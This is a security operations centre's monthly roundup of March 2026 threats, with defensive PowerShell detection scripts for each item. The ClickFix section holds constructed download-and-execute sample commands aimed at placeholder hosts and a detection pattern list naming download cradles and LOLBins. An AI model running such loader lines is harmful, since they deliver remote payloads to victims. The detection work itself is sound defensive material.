Cybersecurity Roundup: March 2026 | Kocho

From Kocho’s Security Operations Centre (SOC)

Published: 08 April 2026

March’s incidents highlight a common set of risks. Trusted access, management platforms and supply chains continue to offer high‑impact attack paths, while unpatched vulnerabilities and overlooked platform changes increase the blast radius when things go wrong.

Here are the key threats and recommended actions identified by our SOC team this month.

Headlines:

  • Intune abuse wipes 200,000 devices in Stryker cyberattack
  • ClickFix social engineering bypasses defences without malware
  • GlassWorm turns stolen GitHub tokens into supply‑chain attacks
  • FortiManager vulnerabilities actively exploited in the wild
  • Update Secure Boot certificates to avoid risk ahead of June deadline
  • Protect against growing device code phishing threats

Stryker hit by large-scale cyberattack leveraging Microsoft Intune

On 11 March 2026, Stryker, a global medical technology manufacturer operating across healthcare systems worldwide, was hit by a destructive cyberattack attributed to the Iran‑linked hacktivist group Handala.

The attackers began by compromising an administrative identity, then escalated privileges and created a new Global Administrator account. Rather than deploying traditional malware, the group relied on living‑off‑the‑land techniques, abusing legitimate tools including PowerShell and, critically, Microsoft Intune.

They used Intune’s built‑in remote‑wipe functionality to erase over 200,000 devices across 79 countries, affecting corporate laptops, mobile devices and, in some cases, personal devices enrolled via Outlook. Stryker confirmed widespread operational disruption, including manufacturing shutdowns and large‑scale device outages, though it reported no impact to customers or partners and is continuing system restoration.

What are the risks?

  • A single privileged account can trigger organisation‑wide disruption without malware
  • Legitimate management platforms can become high‑impact attack tools if controls are weak
  • Device management can extend to personal or lightly governed devices, amplifying blast radius

Recommended actions:

Enforce MFA, phishing-resistant where possible, for all privileged accounts, and make Global Administrator and Intune Administrator eligible-only roles activated just in time through Privileged Identity Management rather than standing assignments.

Restrict and audit who holds Intune roles that can issue device actions. Require a second approver for high-impact actions such as wipe and retire; Intune's multiple administrative approval (access policies) can enforce this for device actions, so a single compromised administrator cannot wipe the estate alone.

Use EDR tools to monitor PowerShell and WMI activity and establish behavioural baselines.

Deploy endpoint protection against infostealers and monitor for leaked credentials on the dark web.

Centralise audit logging across Active Directory, Entra ID and endpoint management platforms.
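
The two steps in the chain described above (a fresh Global Administrator grant, then bulk wipes) are both visible in audit logs if someone is looking. The following is an added example, not Kocho's SOC tooling and not the incident's real logs: it triages exported audit records for those two signals. Record shapes follow Microsoft Graph's Entra ID audit logs and Intune auditEvents, but the values are constructed, and the "wipe ManagedDevice" activityType string is an assumption to check against an export from your own tenant.

```powershell
# Added example: triage exported Entra ID / Intune audit records for a privileged role grant
# followed by a burst of device wipes. All records below are constructed samples.

$entraAuditJson = @'
[
  {"activityDateTime":"2026-03-11T02:10:05Z","activityDisplayName":"Add member to role",
   "initiatedBy":{"user":{"userPrincipalName":"helpdesk.admin@contoso.example"}},
   "targetResources":[{"userPrincipalName":"svc-deploy@contoso.example",
     "modifiedProperties":[{"displayName":"Role.DisplayName","newValue":"\"Global Administrator\""}]}]},
  {"activityDateTime":"2026-03-11T02:11:40Z","activityDisplayName":"Add member to role",
   "initiatedBy":{"user":{"userPrincipalName":"helpdesk.admin@contoso.example"}},
   "targetResources":[{"userPrincipalName":"j.smith@contoso.example",
     "modifiedProperties":[{"displayName":"Role.DisplayName","newValue":"\"Helpdesk Administrator\""}]}]}
]
'@

$intuneAuditJson = @'
[
  {"activityDateTime":"2026-03-11T02:30:00Z","activityType":"wipe ManagedDevice","actor":{"userPrincipalName":"svc-deploy@contoso.example"},"resources":[{"displayName":"LAP-0001"}]},
  {"activityDateTime":"2026-03-11T02:30:04Z","activityType":"wipe ManagedDevice","actor":{"userPrincipalName":"svc-deploy@contoso.example"},"resources":[{"displayName":"LAP-0002"}]},
  {"activityDateTime":"2026-03-11T02:30:09Z","activityType":"wipe ManagedDevice","actor":{"userPrincipalName":"svc-deploy@contoso.example"},"resources":[{"displayName":"LAP-0003"}]},
  {"activityDateTime":"2026-03-11T02:31:15Z","activityType":"wipe ManagedDevice","actor":{"userPrincipalName":"svc-deploy@contoso.example"},"resources":[{"displayName":"LAP-0004"}]},
  {"activityDateTime":"2026-03-11T02:33:40Z","activityType":"wipe ManagedDevice","actor":{"userPrincipalName":"svc-deploy@contoso.example"},"resources":[{"displayName":"LAP-0005"}]},
  {"activityDateTime":"2026-03-11T02:37:02Z","activityType":"wipe ManagedDevice","actor":{"userPrincipalName":"svc-deploy@contoso.example"},"resources":[{"displayName":"LAP-0006"}]},
  {"activityDateTime":"2026-03-11T09:05:00Z","activityType":"wipe ManagedDevice","actor":{"userPrincipalName":"it.tech@contoso.example"},"resources":[{"displayName":"LAP-0190"}]}
]
'@

# Roles whose assignment should page the SOC regardless of who performed it.
$HighPrivilegeRoles = 'Global Administrator', 'Privileged Role Administrator', 'Intune Administrator'

function Find-PrivilegedRoleGrants {
    param([Parameter(Mandatory)][object[]]$Records)
    foreach ($r in $Records | Where-Object { $_.activityDisplayName -eq 'Add member to role' }) {
        foreach ($t in $r.targetResources) {
            # newValue is a JSON-encoded string, so strip the embedded quotes before comparing.
            $role = ($t.modifiedProperties | Where-Object { $_.displayName -eq 'Role.DisplayName' }).newValue -replace '"', ''
            if ($role -in $HighPrivilegeRoles) {
                [pscustomobject]@{
                    Time = $r.activityDateTime; Actor = $r.initiatedBy.user.userPrincipalName
                    Target = $t.userPrincipalName; Role = $role
                }
            }
        }
    }
}

function Find-WipeBursts {
    # Emits one alert per actor whose wipe/retire actions reach $Threshold inside any $WindowMinutes span.
    param([Parameter(Mandatory)][object[]]$Records, [int]$Threshold = 5, [int]$WindowMinutes = 10)
    $wipes = $Records | Where-Object { $_.activityType -match '^(wipe|retire)\b' }
    foreach ($group in ($wipes | Group-Object -Property { $_.actor.userPrincipalName })) {
        $times = @($group.Group | ForEach-Object { [datetimeoffset]::Parse($_.activityDateTime) } | Sort-Object)
        for ($i = 0; $i -le $times.Count - $Threshold; $i++) {
            $span = $times[$i + $Threshold - 1] - $times[$i]
            if ($span.TotalMinutes -le $WindowMinutes) {
                [pscustomobject]@{
                    Actor = $group.Name; TotalWipes = $times.Count
                    BurstStart = $times[$i]; WithinMinutes = [math]::Round($span.TotalMinutes, 1)
                }
                break
            }
        }
    }
}

$entra  = @(ConvertFrom-Json $entraAuditJson)
$intune = @(ConvertFrom-Json $intuneAuditJson)
Find-PrivilegedRoleGrants -Records $entra | Format-Table -AutoSize     # flags svc-deploy -> Global Administrator
Find-WipeBursts -Records $intune -Threshold 5 -WindowMinutes 10 | Format-Table -AutoSize   # flags svc-deploy, 6 wipes in under 4 minutes
```

The threshold of five wipes in ten minutes is an arbitrary starting point; tune it against your own month of audit data, and treat the role-grant alert as the higher-priority signal because it precedes the damage.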

ClickFix social engineering powers fileless ransomware attacks

Ransomware groups including LeakNet have been observed using the ClickFix social engineering technique as an initial access method, tricking users into manually executing malicious commands via the Windows Run dialog or terminal. The approach avoids exploiting software vulnerabilities, instead abusing trusted workflows and legitimate system tools to gain execution.

Recent campaigns deliver staged payloads directly into memory, leaving little artefact on disk and significantly reducing visibility for traditional security controls. Researchers report the technique is being delivered via compromised but legitimate websites and is now being adopted more broadly across ransomware and malware operations targeting both Windows and macOS environments.

What are the risks?

  • User‑executed commands can provide initial access without exploiting a vulnerability
  • Fileless, in‑memory execution reduces forensic visibility and detection
  • Trusted workflows and native tools are abused, bypassing many preventative controls
  • The technique is adaptable and has been observed across multiple platforms

Recommended actions:

Never paste a command from a pop-up, email or web page into the Run dialog or a terminal. A genuine CAPTCHA, browser fix or document viewer never needs you to run a command.

Train users to be wary of urgent or alarming messages prompting them to ‘fix’ an issue quickly.

Verify any unexpected instructions with your IT or security team before taking action.

Restrict the Run dialog, Command Prompt and PowerShell to users who need them. Group Policy offers 'Remove Run menu from Start Menu' (the NoRun value) and 'Prevent access to the command prompt' (DisableCMD) under User Configuration; AppLocker or Windows Defender Application Control can restrict script hosts for everyone else.

Ensure endpoint security tooling inspects process lineage and command lines rather than files alone: explorer.exe spawning powershell.exe, mshta.exe or cmd.exe with a download-and-execute command line is the ClickFix signature, and with in-memory payloads there may be nothing on disk to scan.
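
Because the user types the command themselves, Explorer leaves a trace that does not depend on the payload touching disk: the Run dialog history under HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, one value per command with a trailing "\1" and an MRUList value giving the order. The following is an added example, not Kocho's detection content: it scores Run-dialog entries for the ClickFix traits described above. The patterns and weights are assumptions to tune; the sample commands are constructed (verify.example and update.example are placeholder hosts).

```powershell
# Added example: score Run-dialog history for ClickFix-style one-liners.
# Patterns/weights are assumptions; sample commands below are constructed.

$ClickFixPatterns = @(
    @{ Name = 'HiddenWindow';       Weight = 2; Regex = '(?i)(^|\s)-w(in|indowstyle)?\s+h(idden)?(\s|$)' },
    @{ Name = 'EncodedCommand';     Weight = 2; Regex = '(?i)(^|\s)-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}' },
    @{ Name = 'LolbinFromUrl';      Weight = 2; Regex = '(?i)\b(mshta|msiexec|regsvr32|rundll32)\b.*https?://' },
    @{ Name = 'DownloadCradle';     Weight = 1; Regex = '(?i)\b(iwr|invoke-webrequest|irm|invoke-restmethod|curl|wget|downloadstring|downloadfile|bitsadmin)\b|net\.webclient|certutil\s+-urlcache' },
    @{ Name = 'InMemoryExec';       Weight = 1; Regex = '(?i)\b(iex|invoke-expression)\b' },
    @{ Name = 'FakeCaptchaComment'; Weight = 1; Regex = '(?i)#.*(robot|captcha|verif|human)' }   # the "I am not a robot" tail
)

function Test-ClickFixCommand {
    param([Parameter(Mandatory)][string]$Command)
    $hits  = @(foreach ($p in $ClickFixPatterns) { if ($Command -match $p.Regex) { $p } })
    $score = 0
    foreach ($h in $hits) { $score += $h.Weight }
    [pscustomobject]@{
        Score      = $score
        Suspicious = ($score -ge 2)          # a lone download cradle is common in admin use
        Indicators = ($hits | ForEach-Object { $_.Name }) -join ','
        Command    = $Command
    }
}

function Get-RunMruEntries {
    # Returns the current user's Run history, most recent first; nothing if the key is absent.
    $key = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU'
    if (-not (Test-Path $key)) { return }
    $props = Get-ItemProperty -Path $key
    foreach ($slot in ([string]$props.MRUList).ToCharArray()) {
        $name  = [string]$slot
        $value = [string]$props.$name
        if ($value) { $value -replace '\\1$', '' }   # strip Explorer's "\1" suffix
    }
}

# Constructed sample history: one benign entry, one ClickFix loader, one bare LOLBin launch.
$sample = @(
    'notepad',
    'powershell -w hidden -c "iex (iwr ''https://verify.example/fix'' -UseBasicParsing)" # "I am not a robot - reCAPTCHA Verification ID: 7391"',
    'mshta https://update.example/check.hta'
)
$sample | ForEach-Object { Test-ClickFixCommand -Command $_ } | Format-Table Score, Suspicious, Indicators, Command -AutoSize
# Expected: notepad scores 0; the powershell line scores 5; the mshta line scores 2.

# On a live profile:  Get-RunMruEntries | ForEach-Object { Test-ClickFixCommand -Command $_ }
```

RunMRU only records the Run dialog; commands pasted into an already-open terminal show up instead in PowerShell's ConsoleHost_history.txt (if PSReadLine is loaded) or in script block logging (event ID 4104), so pair this with those sources when triaging a host.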

GlassWorm weaponises GitHub tokens in supply‑chain attacks

An expanded GlassWorm campaign is compromising developer environments to steal GitHub tokens and inject malware directly into live repositories. Attackers force‑push obfuscated code into Python and JavaScript projects while preserving commit metadata, making the changes difficult to spot. Anyone installing affected packages or running compromised code triggers an in‑memory payload, enabling downstream compromise across software supply chains.

What are the risks?

  • Compromised developer accounts can propagate malware across dozens of downstream projects and their users
  • Force-pushed commits can be difficult to distinguish from legitimate updates without careful review
  • Transitive dependency infections are invisible to surface-level audits of direct dependencies

Recommended actions:

Install extensions and packages from trusted, verified sources only, and review every update and unexpected dependency change before accepting it.

Enable MFA on all development accounts, prefer short-lived or fine-grained tokens with the minimum scopes, and rotate and revoke tokens regularly.

Monitor repositories for unusual commit activity, force-pushes (non-fast-forward updates) or unexpected new dependencies; branch protection that blocks force-pushes to release branches removes the quietest path.
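
A force-push that preserves commit metadata looks, from the outside, like a history rewrite carrying commits dated well before the push, often touching a dependency manifest and adding a source file. The following is an added example, not GlassWorm research code or Kocho tooling: it flags those characteristics on a GitHub push-event payload and scans text for leaked GitHub tokens. The payload is a constructed sample shaped like a GitHub push webhook (the org, repository, hashes and timestamps are invented), and the thresholds are assumptions to tune per repository.

```powershell
# Added example: flag suspicious push characteristics on a GitHub push webhook payload and
# find leaked GitHub tokens in text. Payload, names and tokens are constructed samples.

$pushEventJson = @'
{
  "ref": "refs/heads/main",
  "before": "a1b2c3d4e5f60718293a4b5c6d7e8f9012345678",
  "after":  "f0e1d2c3b4a5968778695a4b3c2d1e0f12345678",
  "forced": true,
  "pusher": { "name": "maintainer-bot" },
  "repository": { "full_name": "example-org/widget-lib", "pushed_at": 1773273600 },
  "commits": [
    {
      "id": "f0e1d2c3b4a5968778695a4b3c2d1e0f12345678",
      "message": "chore: bump deps",
      "timestamp": "2026-02-20T09:15:00Z",
      "author":    { "name": "Original Maintainer", "email": "maint@example.org" },
      "committer": { "name": "Original Maintainer", "email": "maint@example.org" },
      "added":    ["src/_init_hook.py"],
      "removed":  [],
      "modified": ["setup.py", "requirements.txt"]
    }
  ]
}
'@

# Dependency manifests for the Python and JavaScript ecosystems the campaign targets.
$ManifestRegex = '^(package\.json|package-lock\.json|yarn\.lock|pnpm-lock\.yaml|requirements.*\.txt|pyproject\.toml|setup\.py|setup\.cfg|Pipfile|Pipfile\.lock|poetry\.lock)$'

function Get-SuspiciousPushFindings {
    param([Parameter(Mandatory)]$PushEvent, [int]$BackdateDays = 7)
    $pushedAt = [datetimeoffset]::FromUnixTimeSeconds([long]$PushEvent.repository.pushed_at)
    $findings = @()
    if ($PushEvent.forced) {
        $findings += "history rewritten: force-push to $($PushEvent.ref) ($($PushEvent.before.Substring(0, 7)) -> $($PushEvent.after.Substring(0, 7)))"
    }
    foreach ($c in $PushEvent.commits) {
        $short = $c.id.Substring(0, 7)
        # A commit dated long before the push, arriving with a rewrite, is what "preserved
        # metadata" looks like from outside. Long-lived branch merges trip this too, hence a score.
        $age = $pushedAt - [datetimeoffset]::Parse($c.timestamp)
        if ($age.TotalDays -gt $BackdateDays) {
            $findings += "commit $short is dated $([math]::Floor($age.TotalDays)) days before the push"
        }
        $touched   = @($c.added) + @($c.modified)
        $manifests = @($touched | Where-Object { (Split-Path $_ -Leaf) -match $ManifestRegex })
        if ($manifests) { $findings += "commit $short changes dependency manifest(s): $($manifests -join ', ')" }
        $newSource = @($c.added | Where-Object { $_ -match '\.(py|js|mjs|cjs|ts)$' })
        if ($newSource -and $manifests) {
            $findings += "commit $short adds source alongside manifest changes: $($newSource -join ', ')"
        }
    }
    [pscustomobject]@{
        Repository = $PushEvent.repository.full_name; Pusher = $PushEvent.pusher.name
        Score = $findings.Count; Findings = $findings
    }
}

# GitHub's documented token prefixes: ghp_/gho_/ghu_/ghs_/ghr_ carry 36 characters; github_pat_ carries 22 + "_" + 59.
$GitHubTokenRegex = '\b(ghp|gho|ghu|ghs|ghr)_[A-Za-z0-9]{36}\b|\bgithub_pat_[A-Za-z0-9]{22}_[A-Za-z0-9]{59}\b'

function Find-GitHubTokenLeaks {
    param([Parameter(Mandatory)][string[]]$Lines)
    for ($i = 0; $i -lt $Lines.Count; $i++) {
        foreach ($m in [regex]::Matches($Lines[$i], $GitHubTokenRegex)) {
            # Report a prefix only; never echo the full secret into a ticket or log.
            [pscustomobject]@{ Line = $i + 1; TokenPrefix = $m.Value.Substring(0, 8) + '...' }
        }
    }
}

Get-SuspiciousPushFindings -PushEvent (ConvertFrom-Json $pushEventJson) | Format-List   # 4 findings for the sample
# Constructed sample lines; the token is a placeholder built from repeated characters.
Find-GitHubTokenLeaks -Lines @('GITHUB_USER=maint', "GITHUB_TOKEN=ghp_$('A' * 36)", 'PYPI_TOKEN=pypi-placeholder')
```

Wire Get-SuspiciousPushFindings to a webhook receiver or run it over the repository's push history, and treat a forced push combined with a manifest change on a release branch as an immediate pause on publishing until a human has diffed the commit.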

FortiManager under active attack (CVE-2024-47575, CVE-2025-54820)

A critical vulnerability affecting Fortinet FortiManager, tracked as CVE‑2024‑47575, is being actively exploited in the wild, allowing remote, unauthenticated attackers to execute arbitrary commands. Threat actors have been observed using automated tools to exfiltrate sensitive data from compromised systems, including administrative credentials, configuration files and IP inventories, enabling further compromise of downstream managed devices.

The UK National Cyber Security Centre has confirmed it is investigating multiple incidents, indicating the activity is ongoing and targeted rather than theoretical. A second flaw, CVE‑2025‑54820, affects the FortiManager fgtupdates service. While not yet observed in active exploitation, it still represents a viable remote execution risk in exposed environments if left unpatched.

What are the risks?

  • Unauthenticated Remote Code Execution (RCE) enabling full takeover of FortiManager instances
  • Theft of admin credentials, configs and network topology data, enabling broader compromise
  • Automated exploitation at scale, including targeted activity against UK organisations
  • Potential for remote code execution via the fgtupdates service (CVE‑2025‑54820)

Recommended actions:

Patch immediately: upgrade to FortiManager 7.4.3 or later, or 7.2.11 or later, and migrate away from unsupported 6.4 versions. Fixed builds differ per release branch, so confirm the fixed version for your branch in Fortinet's PSIRT advisory before declaring a device patched.

Disable the fgtupdates service to reduce exposure to CVE-2025-54820 where patching is delayed.

Conduct compromise assessments using vendor-provided IoCs. Assume credential exposure and reset all administrative credentials and API keys if compromise is suspected.

UK organisations should report suspected compromise to the NCSC.
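
Two of the actions above are mechanical and worth scripting across an estate: deciding which FortiManager instances are below the fixed version, and sweeping exported logs for the advisory's indicators. The following is an added example, not Fortinet's or Kocho's tooling. The fixed-version table repeats the article's figures for the 7.4 and 7.2 branches only; other branches are reported as "check the advisory" rather than guessed. Device names, version strings, log lines and the indicator list are all constructed placeholders (the IP address is from the TEST-NET range).

```powershell
# Added example: version gate and indicator sweep for FortiManager. Fixed versions are the
# article's figures; all device names, log lines and indicators are constructed placeholders.

$FixedVersions       = @{ '7.4' = [version]'7.4.3'; '7.2' = [version]'7.2.11' }
$UnsupportedBranches = @('6.4')

function Test-FortiManagerVersion {
    # Accepts the string printed by "get system status", e.g. "v7.4.2-build0001 (GA)".
    param([Parameter(Mandatory)][string]$Device, [Parameter(Mandatory)][string]$VersionString)
    if ($VersionString -notmatch 'v?(\d+)\.(\d+)\.(\d+)') {
        return [pscustomobject]@{ Device = $Device; Version = $VersionString; Branch = $null; Status = 'unparseable' }
    }
    $v      = [version]"$($Matches[1]).$($Matches[2]).$($Matches[3])"
    $branch = "$($v.Major).$($v.Minor)"
    if ($branch -in $UnsupportedBranches) {
        $status = 'unsupported branch: migrate'
    } elseif (-not $FixedVersions.ContainsKey($branch)) {
        $status = 'branch not in table: check Fortinet PSIRT advisory'
    } elseif ($v -ge $FixedVersions[$branch]) {
        $status = 'patched'
    } else {
        $status = "vulnerable: upgrade to $($FixedVersions[$branch]) or later"
    }
    [pscustomobject]@{ Device = $Device; Version = $v.ToString(); Branch = $branch; Status = $status }
}

function Find-IndicatorHits {
    # Case-insensitive substring search so an IoC list copied from an advisory works as-is.
    param([Parameter(Mandatory)][string[]]$LogLines, [Parameter(Mandatory)][string[]]$Indicators)
    for ($i = 0; $i -lt $LogLines.Count; $i++) {
        foreach ($ioc in $Indicators) {
            if ($LogLines[$i].IndexOf($ioc, [System.StringComparison]::OrdinalIgnoreCase) -ge 0) {
                [pscustomobject]@{ Line = $i + 1; Indicator = $ioc; Text = $LogLines[$i] }
            }
        }
    }
}

# 1. Version gate over a constructed inventory (in practice, collect "get system status" per device).
@(
    @{ Device = 'fmg-lon-01'; Version = 'v7.4.2-build0001 (GA)' },    # vulnerable
    @{ Device = 'fmg-lon-02'; Version = 'v7.2.11-build0002 (GA)' },   # patched
    @{ Device = 'fmg-lab-01'; Version = 'v6.4.15-build0003 (GA)' },   # unsupported branch
    @{ Device = 'fmg-lab-02'; Version = 'v7.0.12-build0004 (GA)' }    # not in table: check advisory
) | ForEach-Object { Test-FortiManagerVersion -Device $_.Device -VersionString $_.Version } | Format-Table -AutoSize

# 2. Indicator sweep over constructed log lines; replace $indicators with the advisory's list.
$indicators = @('203.0.113.45', '/tmp/.placeholder-marker')
$logLines = @(
    'date=2026-03-02 time=03:14:07 type=event subtype=system user="admin" srcip=203.0.113.45 msg="Login succeeded"',
    'date=2026-03-02 time=03:16:30 type=event subtype=system user="admin" srcip=10.20.0.8 msg="Config changed"',
    'date=2026-03-02 time=03:20:01 type=event subtype=system msg="File /tmp/.placeholder-marker created"'
)
Find-IndicatorHits -LogLines $logLines -Indicators $indicators | Format-Table -AutoSize   # lines 1 and 3 hit
```

A "patched" result from the version gate says nothing about whether the device was already compromised before the upgrade; run the indicator sweep and the credential reset regardless.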

Update Secure Boot certificates to avoid risk ahead of June deadline

Secure Boot certificates issued in 2011 begin expiring from June 2026: the Microsoft Corporation KEK CA 2011 and Microsoft UEFI CA 2011 expire in June, and the Microsoft Windows Production PCA 2011 follows in October 2026. These certificates protect the early boot process by ensuring only trusted firmware and operating system components can run. Organisations should now confirm whether devices have received the updated 2023 certificates (Microsoft Corporation KEK 2K CA 2023, Microsoft UEFI CA 2023 and Windows UEFI CA 2023) and understand the risks if they have not.

Microsoft is deploying updated certificates via Windows updates, but not all devices qualify. Some hardware requires OEM firmware updates before the new certificates can take effect.

What are the risks?

  • Loss of future Secure Boot protections: devices keep booting after expiry, but without the 2023 certificates they cannot receive future boot-component security updates (new boot managers, DBX revocations)
  • Increased exposure to boot‑level threats such as bootkits and rootkits as those revocations go unapplied
  • Compatibility issues with newer operating systems, firmware and boot components signed only by the 2023 chain

Recommended actions:

Inventory devices to confirm certificate status before June 2026.

Keep Windows Update enabled.

Apply required OEM firmware (UEFI/BIOS) updates.

For Azure Virtual Desktop, update golden images and ensure Trusted Launch is enabled.
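
Inventorying certificate status comes down to reading two UEFI variables and one registry key per device. The following is an added example, not Microsoft's or Kocho's tooling. The db and KEK checks match on the certificate subject strings Microsoft's guidance uses; the Servicing registry values (UEFICA2023Status, AvailableUpdates) are as documented in that guidance at the time of writing and should be verified against the current version before relying on them. Run it elevated, since Get-SecureBootUEFI needs administrator rights; the hosts.txt path in the fleet example is hypothetical.

```powershell
# Added example: report whether a Windows device already holds the 2023 Secure Boot certificates.
# Registry value names are as documented by Microsoft at time of writing; verify against current guidance.

function Get-SecureBootCertStatus {
    $r = [ordered]@{
        ComputerName             = $env:COMPUTERNAME
        SecureBootEnabled        = $null
        DbHasWindowsUefiCa2023   = $null   # signs Windows boot managers from the 2023 chain
        DbHasMicrosoftUefiCa2023 = $null   # third-party / option ROM chain
        KekHas2023               = $null   # needed to accept future db/dbx updates
        ServicingStatus          = $null
        AvailableUpdates         = $null
        Error                    = $null
    }
    try {
        $r.SecureBootEnabled = Confirm-SecureBootUEFI
        $db  = [System.Text.Encoding]::ASCII.GetString((Get-SecureBootUEFI -Name db).Bytes)
        $kek = [System.Text.Encoding]::ASCII.GetString((Get-SecureBootUEFI -Name KEK).Bytes)
        $r.DbHasWindowsUefiCa2023   = $db  -match 'Windows UEFI CA 2023'
        $r.DbHasMicrosoftUefiCa2023 = $db  -match 'Microsoft UEFI CA 2023'
        $r.KekHas2023               = $kek -match 'Microsoft Corporation KEK 2K CA 2023'
    } catch {
        # Legacy BIOS, a VM without UEFI/vTPM, or a non-elevated shell all land here.
        $r.Error = $_.Exception.Message
    }
    $servicing = 'HKLM:\SYSTEM\CurrentControlSet\Control\SecureBoot\Servicing'
    if (Test-Path $servicing) {
        $p = Get-ItemProperty -Path $servicing
        $r.ServicingStatus  = $p.UEFICA2023Status
        $r.AvailableUpdates = $p.AvailableUpdates
    }
    [pscustomobject]$r
}

function Get-SecureBootReadiness {
    param([Parameter(Mandatory)]$Status)
    if ($Status.Error)                                            { return "could not query: $($Status.Error)" }
    if ($Status.SecureBootEnabled -ne $true)                      { return 'Secure Boot disabled: enable in firmware first' }
    if ($Status.DbHasWindowsUefiCa2023 -and $Status.KekHas2023)   { return 'updated' }
    if ($Status.DbHasWindowsUefiCa2023)                           { return 'db updated, KEK pending (may need OEM firmware)' }
    if ($Status.ServicingStatus -eq 'InProgress')                 { return 'update in progress' }
    return 'not updated'
}

# Single device:
$status = Get-SecureBootCertStatus
$status | Format-List
Get-SecureBootReadiness -Status $status

# Fleet inventory over WinRM (assumes remoting and local admin on each target; hosts.txt is hypothetical):
# Invoke-Command -ComputerName (Get-Content .\hosts.txt) -ScriptBlock ${function:Get-SecureBootCertStatus} |
#     Select-Object *, @{ n = 'Readiness'; e = { Get-SecureBootReadiness -Status $_ } } |
#     Export-Csv .\secureboot-inventory.csv -NoTypeInformation
```

The "KEK pending" state is the one to chase with OEMs: the db can be updated by Windows, but a KEK entry must be signed by the platform owner's key, which is why some hardware needs a firmware update before the 2023 chain is complete.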

From our blog

How Device Code phishing reveals a critical identity blind spot

Device Code phishing is an increasingly common technique that abuses Microsoft’s legitimate Device Code Flow to gain access tokens without stealing a password. Because the sign-in page is genuine, the key risk is authorising a code you didn’t initiate.

Our latest security article breaks down how the attack works, why it creates a blind spot in modern identity security, and the steps organisations should take to reduce exposure and detect misuse.
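
One detail makes device code abuse detectable from sign-in logs: the record for the token request carries the IP and location of the device that started the flow, which in a phishing case is the attacker's machine, not the victim's browser. The following is an added example, not taken from the linked article: it triages exported Entra ID sign-in records for device code sign-ins that fall outside a per-user baseline. Field names follow the Microsoft Graph signIn resource (authenticationProtocol reports "deviceCode" for this flow); the records, the baseline and the expected-app list are constructed.

```powershell
# Added example: flag device code flow sign-ins outside a user's baseline. Records, baseline and
# expected-app list are constructed; field names follow the Graph signIn resource.

$signInsJson = @'
[
  {"createdDateTime":"2026-03-18T10:02:11Z","userPrincipalName":"a.jones@contoso.example","appDisplayName":"Microsoft Office","authenticationProtocol":"deviceCode","ipAddress":"198.51.100.23","location":{"countryOrRegion":"NL"},"status":{"errorCode":0}},
  {"createdDateTime":"2026-03-18T10:05:40Z","userPrincipalName":"a.jones@contoso.example","appDisplayName":"Microsoft Office","authenticationProtocol":"oAuth2","ipAddress":"203.0.113.7","location":{"countryOrRegion":"GB"},"status":{"errorCode":0}},
  {"createdDateTime":"2026-03-18T11:15:02Z","userPrincipalName":"k.patel@contoso.example","appDisplayName":"Azure CLI","authenticationProtocol":"deviceCode","ipAddress":"203.0.113.40","location":{"countryOrRegion":"GB"},"status":{"errorCode":0}}
]
'@

# Constructed baseline: where each user normally signs in from, and apps that legitimately use the flow.
$BaselineCountries      = @{ 'a.jones@contoso.example' = @('GB'); 'k.patel@contoso.example' = @('GB') }
$ExpectedDeviceCodeApps = @('Azure CLI')

function Find-SuspiciousDeviceCodeSignIns {
    param(
        [Parameter(Mandatory)][object[]]$SignIns,
        [hashtable]$Baseline = $BaselineCountries,
        [string[]]$ExpectedApps = $ExpectedDeviceCodeApps
    )
    foreach ($s in $SignIns | Where-Object { $_.authenticationProtocol -eq 'deviceCode' -and $_.status.errorCode -eq 0 }) {
        $reasons = @()
        $country = $s.location.countryOrRegion
        if (-not $Baseline.ContainsKey($s.userPrincipalName) -or $country -notin $Baseline[$s.userPrincipalName]) {
            $reasons += "country $country outside baseline"
        }
        if ($s.appDisplayName -notin $ExpectedApps) {
            $reasons += "app '$($s.appDisplayName)' not expected to use device code"
        }
        if ($reasons) {
            [pscustomobject]@{
                Time = $s.createdDateTime; User = $s.userPrincipalName; App = $s.appDisplayName
                IP = $s.ipAddress; Country = $country; Reasons = $reasons -join '; '
            }
        }
    }
}

Find-SuspiciousDeviceCodeSignIns -SignIns @(ConvertFrom-Json $signInsJson) | Format-Table -AutoSize
# Expected: a.jones's Office sign-in from NL is flagged on both counts; k.patel's Azure CLI sign-in is not.
```

Where the flow is not needed at all, the preventive control is a Conditional Access policy using the authentication flows condition to block device code flow tenant-wide, with a tightly scoped exclusion for the few accounts and apps that genuinely require it.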
